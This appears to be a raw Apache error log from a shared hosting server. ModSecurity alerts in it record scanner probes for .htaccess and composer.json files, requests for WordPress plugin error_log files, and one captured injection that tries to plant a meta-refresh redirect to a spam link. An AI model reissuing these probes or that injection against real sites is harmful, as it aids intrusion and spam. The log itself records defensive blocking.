[Mon May 11 12:37:47.324338 2026] [proxy_fcgi:error] [pid 1254133:tid 1254151] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:47.423813 2026] [proxy_fcgi:error] [pid 1254133:tid 1254151] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:47.528182 2026] [proxy_fcgi:error] [pid 1254133:tid 1254151] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:47.624577 2026] [proxy_fcgi:error] [pid 1254133:tid 1254151] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:47.720910 2026] [proxy_fcgi:error] [pid 1254133:tid 1254151] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:47.817135 2026] [proxy_fcgi:error] [pid 1254133:tid 1254151] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:47.915751 2026] [proxy_fcgi:error] [pid 1254133:tid 1254151] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:48.034243 2026] [proxy_fcgi:error] [pid 1254133:tid 1254151] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:48.147576 2026] [proxy_fcgi:error] [pid 1254133:tid 1254151] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:48.243961 2026] [proxy_fcgi:error] [pid 1254133:tid 1254151] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:48.467906 2026] [proxy_fcgi:error] [pid 1254133:tid 1254151] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:48.578813 2026] [proxy_fcgi:error] [pid 1254133:tid 1254151] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:48.675728 2026] [proxy_fcgi:error] [pid 1254133:tid 1254151] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:48.772172 2026] [proxy_fcgi:error] [pid 1254133:tid 1254151] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:48.870717 2026] [proxy_fcgi:error] [pid 1254133:tid 1254151] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:48.979277 2026] [proxy_fcgi:error] [pid 1254133:tid 1254151] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:49.075701 2026] [proxy_fcgi:error] [pid 1254133:tid 1254151] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:49.175724 2026] [proxy_fcgi:error] [pid 1254133:tid 1254151] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:49.382730 2026] [proxy_fcgi:error] [pid 1254133:tid 1254151] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:49.481651 2026] [proxy_fcgi:error] [pid 1254133:tid 1254151] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:49.578900 2026] [proxy_fcgi:error] [pid 1254133:tid 1254151] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:49.677380 2026] [proxy_fcgi:error] [pid 1254133:tid 1254151] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:49.783487 2026] [proxy_fcgi:error] [pid 1254133:tid 1254151] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:49.883412 2026] [proxy_fcgi:error] [pid 1254133:tid 1254151] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:49.979929 2026] [proxy_fcgi:error] [pid 1254133:tid 1254151] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:50.078387 2026] [proxy_fcgi:error] [pid 1254133:tid 1254151] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:50.187303 2026] [proxy_fcgi:error] [pid 1254133:tid 1254151] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:50.483308 2026] [proxy_fcgi:error] [pid 1254133:tid 1254151] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:50.580623 2026] [proxy_fcgi:error] [pid 1254133:tid 1254151] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:50.700186 2026] [proxy_fcgi:error] [pid 1254133:tid 1254151] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:50.797148 2026] [proxy_fcgi:error] [pid 1254133:tid 1254151] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:50.910170 2026] [proxy_fcgi:error] [pid 1254133:tid 1254151] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:51.026339 2026] [proxy_fcgi:error] [pid 1254133:tid 1254151] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:51.343515 2026] [proxy_fcgi:error] [pid 1254133:tid 1254151] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:51.439953 2026] [proxy_fcgi:error] [pid 1254133:tid 1254151] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:51.539926 2026] [proxy_fcgi:error] [pid 1254133:tid 1254151] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:51.636070 2026] [proxy_fcgi:error] [pid 1254133:tid 1254151] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:51.745968 2026] [proxy_fcgi:error] [pid 1254133:tid 1254151] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:51.843267 2026] [proxy_fcgi:error] [pid 1254133:tid 1254151] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:51.953878 2026] [proxy_fcgi:error] [pid 1254133:tid 1254151] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:52.050117 2026] [proxy_fcgi:error] [pid 1254133:tid 1254151] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:52.439077 2026] [proxy_fcgi:error] [pid 1254133:tid 1254151] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:52.546281 2026] [proxy_fcgi:error] [pid 1254133:tid 1254151] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:52.659721 2026] [proxy_fcgi:error] [pid 1254133:tid 1254151] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:52.757523 2026] [proxy_fcgi:error] [pid 1254133:tid 1254151] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:52.853774 2026] [proxy_fcgi:error] [pid 1254133:tid 1254151] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:52.950073 2026] [proxy_fcgi:error] [pid 1254133:tid 1254151] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:55.645002 2026] [security2:error] [pid 1254328:tid 1254343] [client 185.177.72.9:44076] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htaccess found within REQUEST_FILENAME: /gcp/.htaccess2024"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/gcp/.htaccess2024"] [unique_id "agGxg0Rdw2n9wv6Ai48X6QAAAIw"]
[Mon May 11 12:37:55.645221 2026] [security2:error] [pid 1254328:tid 1254343] [client 185.177.72.9:44076] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/gcp/.htaccess2024"] [unique_id "agGxg0Rdw2n9wv6Ai48X6QAAAIw"]
[Mon May 11 12:37:56.788170 2026] [security2:error] [pid 1254328:tid 1254343] [client 185.177.72.9:44076] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGxg0Rdw2n9wv6Ai48X6QAAAIw"]
[Mon May 11 12:37:56.816209 2026] [security2:error] [pid 1254133:tid 1254141] [client 185.177.72.9:44086] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htaccess found within REQUEST_FILENAME: /gcp/.htaccess2024"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/gcp/.htaccess2024"] [unique_id "agGxhBjZymfuKpjWXeiNKgAAAMU"]
[Mon May 11 12:37:56.816412 2026] [security2:error] [pid 1254133:tid 1254141] [client 185.177.72.9:44086] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/gcp/.htaccess2024"] [unique_id "agGxhBjZymfuKpjWXeiNKgAAAMU"]
[Mon May 11 12:37:58.015517 2026] [security2:error] [pid 1254133:tid 1254141] [client 185.177.72.9:44086] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGxhBjZymfuKpjWXeiNKgAAAMU"]
[Mon May 11 12:38:00.434696 2026] [security2:error] [pid 1254179:tid 1254182] [client 185.177.72.9:44114] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htaccess found within REQUEST_FILENAME: /grails/.htaccess-hotfix"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/grails/.htaccess-hotfix"] [unique_id "agGxiGS6k_SCYd1AVZq_-AAAAQE"]
[Mon May 11 12:38:00.438273 2026] [security2:error] [pid 1254179:tid 1254182] [client 185.177.72.9:44114] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/grails/.htaccess-hotfix"] [unique_id "agGxiGS6k_SCYd1AVZq_-AAAAQE"]
[Mon May 11 12:38:01.636243 2026] [security2:error] [pid 1254179:tid 1254182] [client 185.177.72.9:44114] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGxiGS6k_SCYd1AVZq_-AAAAQE"]
[Mon May 11 12:38:01.661239 2026] [security2:error] [pid 1254242:tid 1254251] [client 185.177.72.9:44118] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htaccess found within REQUEST_FILENAME: /grails/.htaccess-hotfix"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/grails/.htaccess-hotfix"] [unique_id "agGxib4KNmD_mZ_vlf9KpwAAAEU"]
[Mon May 11 12:38:01.661446 2026] [security2:error] [pid 1254242:tid 1254251] [client 185.177.72.9:44118] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/grails/.htaccess-hotfix"] [unique_id "agGxib4KNmD_mZ_vlf9KpwAAAEU"]
[Mon May 11 12:38:02.102679 2026] [:error] [pid 1254212:tid 1254236] [client 114.119.133.119:23671] File does not exist: /home/totalcloud/public_html/index.php, referer: https://totalcloud.fr/webshop?ccce=affiliates&systpl=six&language=arabic
[Mon May 11 12:38:02.864040 2026] [security2:error] [pid 1254242:tid 1254251] [client 185.177.72.9:44118] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGxib4KNmD_mZ_vlf9KpwAAAEU"]
[Mon May 11 12:39:14.866821 2026] [security2:error] [pid 1254133:tid 1254150] [client 185.177.72.9:50704] ModSecurity: Warning. Matched phrase "/composer.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /composer.json found within REQUEST_FILENAME: /monitor/composer.json20240101"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/monitor/composer.json20240101"] [unique_id "agGx0hjZymfuKpjWXeiOAQAAAM4"]
[Mon May 11 12:39:14.867148 2026] [security2:error] [pid 1254133:tid 1254150] [client 185.177.72.9:50704] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/monitor/composer.json20240101"] [unique_id "agGx0hjZymfuKpjWXeiOAQAAAM4"]
[Mon May 11 12:39:16.061945 2026] [security2:error] [pid 1254133:tid 1254150] [client 185.177.72.9:50704] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGx0hjZymfuKpjWXeiOAQAAAM4"]
[Mon May 11 12:39:16.089555 2026] [security2:error] [pid 1254212:tid 1254220] [client 185.177.72.9:50712] ModSecurity: Warning. Matched phrase "/composer.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /composer.json found within REQUEST_FILENAME: /monitor/composer.json20240101"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/monitor/composer.json20240101"] [unique_id "agGx1EYQeUtAPynIs6xpoQAAAAY"]
[Mon May 11 12:39:16.089757 2026] [security2:error] [pid 1254212:tid 1254220] [client 185.177.72.9:50712] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/monitor/composer.json20240101"] [unique_id "agGx1EYQeUtAPynIs6xpoQAAAAY"]
[Mon May 11 12:39:17.383226 2026] [security2:error] [pid 1254212:tid 1254220] [client 185.177.72.9:50712] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGx1EYQeUtAPynIs6xpoQAAAAY"]
[Mon May 11 12:39:21.133709 2026] [:error] [pid 1254179:tid 1254204] [client 39.34.93.72:55084] File does not exist: /home/ixinabou/public_html/xmlrpc.php
[Mon May 11 12:39:49.455380 2026] [security2:error] [pid 1254179:tid 1254191] [client 194.53.140.121:29427] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGx9WS6k_SCYd1AVZrAogAAAQo"], referer: https://www.piregwan-genesis.com/
[Mon May 11 12:40:22.276700 2026] [authz_core:error] [pid 1254133:tid 1254146] [client 94.103.87.20:33494] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/user-meta/framework/custom-meta/error_log
[Mon May 11 12:40:24.420580 2026] [authz_core:error] [pid 1254133:tid 1254146] [client 94.103.87.20:33494] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/user-meta/framework/custom-meta/error_log
[Mon May 11 12:40:26.409059 2026] [authz_core:error] [pid 1254133:tid 1254146] [client 94.103.87.20:33494] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/user-meta/framework/custom-meta/error_log
[Mon May 11 12:40:28.436045 2026] [authz_core:error] [pid 1254133:tid 1254146] [client 94.103.87.20:33494] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/src/user-meta/framework/custom-meta/error_log
[Mon May 11 12:40:48.215450 2026] [security2:error] [pid 1256241:tid 1256259] [client 185.177.72.9:58984] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htaccess found within REQUEST_FILENAME: /sbin/.htaccess-old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/sbin/.htaccess-old"] [unique_id "agGyMJkIEwRJMyDaV55fbwAAAU0"]
[Mon May 11 12:40:48.215818 2026] [security2:error] [pid 1256241:tid 1256259] [client 185.177.72.9:58984] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/sbin/.htaccess-old"] [unique_id "agGyMJkIEwRJMyDaV55fbwAAAU0"]
[Mon May 11 12:40:49.371234 2026] [security2:error] [pid 1256241:tid 1256259] [client 185.177.72.9:58984] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGyMJkIEwRJMyDaV55fbwAAAU0"]
[Mon May 11 12:40:49.398230 2026] [security2:error] [pid 1254328:tid 1254335] [client 185.177.72.9:58990] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htaccess found within REQUEST_FILENAME: /sbin/.htaccess-old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/sbin/.htaccess-old"] [unique_id "agGyMURdw2n9wv6Ai48ZZQAAAIQ"]
[Mon May 11 12:40:49.398805 2026] [security2:error] [pid 1254328:tid 1254335] [client 185.177.72.9:58990] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/sbin/.htaccess-old"] [unique_id "agGyMURdw2n9wv6Ai48ZZQAAAIQ"]
[Mon May 11 12:40:50.612615 2026] [security2:error] [pid 1254328:tid 1254335] [client 185.177.72.9:58990] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGyMURdw2n9wv6Ai48ZZQAAAIQ"]
[Mon May 11 12:40:52.316726 2026] [authz_core:error] [pid 1254328:tid 1254352] [client 94.103.87.20:55514] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/error_log
[Mon May 11 12:40:54.480989 2026] [authz_core:error] [pid 1254328:tid 1254352] [client 94.103.87.20:55514] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/error_log
[Mon May 11 12:40:55.716512 2026] [security2:error] [pid 1256241:tid 1256247] [client 194.233.64.127:53415] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://cleanuri.com/nmbbv1>kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://cleanuri.com/nmbbv1 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGyN5kIEwRJMyDaV55fdQAAAUE"]
